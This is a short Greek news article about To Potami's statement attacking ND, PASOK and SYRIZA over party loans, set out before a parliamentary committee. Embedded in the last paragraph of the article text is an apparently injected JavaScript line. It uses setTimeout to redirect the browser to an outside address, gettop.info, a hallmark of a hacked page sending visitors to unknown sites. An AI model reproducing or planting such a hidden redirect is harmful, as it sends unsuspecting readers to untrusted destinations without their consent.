Ποτάμι: Τα χρεοκοπημένα κόμματα δεν μπορούν να σώσουν τη χώρα από τη χρεοκοπία

0
4

 

Το Ποτάμι με ανακοίνωσή του σχολίασε σχετικά με αυτά που έχουν κατατεθεί στην Εξεταστική Επιτροπή της Βουλής για τα οικονομικά των κομμάτων: «Δεν ελπίζουμε ότι οι χρεοκοπημένοι μπορούν να μας βγάλουν από τη χρεοκοπία».

Σύμφωνα με το Ποτάμι, «εάν ήθελε κάποιος να δει με τον πιο καθαρό τρόπο τους λόγους χρεοκοπίας της Ελλάδας, δεν θα είχε παρά να παρακολουθήσει τη συνεδρίαση της Επιτροπής της Βουλής για τα δάνεια των κομμάτων.

Θα έβγαζε δύο συμπεράσματα:α) Θα καταλάβαινε αμέσως γιατί κόμματα που είναι τα ίδια χρεοκοπημένα δεν μπορούν να σώσουν τη χώρα από τη χρεοκοπία και β) θα έβλεπε πόσο μοιάζουν οι σημερινοί κυβερνώντες του ΣΥΡΙΖΑ με τους προηγούμενους».

Επίσης, το Ποτάμι επικρίνει τη ΝΔ και το ΠΑΣΟΚ για τα χρέη τους, τα οποία, όπως υποστηρίζει, αθροιστικά είναι περίπου 390 εκατ. (200 εκατ. της ΝΔ και 190 εκατ. του ΠΑΣΟΚ).

«Δανεικά κι αγύριστα. «Έλα μωρέ, εξουσία είμαστε, ποιος θα μας ελέγξει. Για τον ΣΥΡΙΖΑ του πρώην «ηθικού πλεονεκτήματος» αποκαλύπτεται ότι χρησιμοποιεί τις ίδιες μεθόδους», προσθέτει. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here